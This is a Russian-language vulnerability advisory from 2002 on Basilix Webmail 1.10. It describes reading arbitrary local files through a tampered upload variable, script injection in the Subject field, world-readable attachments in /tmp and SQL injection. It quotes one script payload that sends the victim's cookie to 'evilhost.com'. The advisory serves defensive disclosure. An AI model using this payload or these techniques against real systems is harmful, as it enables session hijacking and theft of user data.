Множественные уязвимости в Basilix Webmail System

Дата публикации:
24.06.2002
Всего просмотров:
678
Опасность:
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Описание: Basilix Webmail System – простая система webmail, написанная на PHP.
  1. Можно прикрепить любой файл на webmail хосте к почтовому сообщению. При загрузки файла, PHP устанавливает некоторые глобальные переменные, одна из которых дает временное местоположение, где загруженный файл был сохранен. BasiliX не проверяет, было ли вложение действительно загружено пользователем. Пользователь может изменить переменную к известному локальному файлу и загрузить его.
  2. При просмотре почтового сообщения, не фильтруются тэги в поле Subject. Нападающий может включать произвольный javascript код в Subject, который бодет выполнен в браузере пользователя при просмотре уязвимого сообщения. Уязвимость может использоваться для перехвата куки:
    <script>self.location.href="http://evilhost.com/evil?"+escape(document.
    cookie)</script>
  3. Прикрепленный файл записывается в /tmp/BasiliX и может быть прочитан любым пользователем.
  4. Данные от пользователя пропускаются к SQL выражению без фильтрации, тем самым позволяя изменить существующий SQL запрос. Уязвимость позволяет получить чувствительную информацию из базы данных или модифицировать существующие данные.
Уязвимость обнаружена в Basilix Webmail 1.10

Ссылки: BasiliX multiple vulnerabilities
или введите имя

CAPTCHA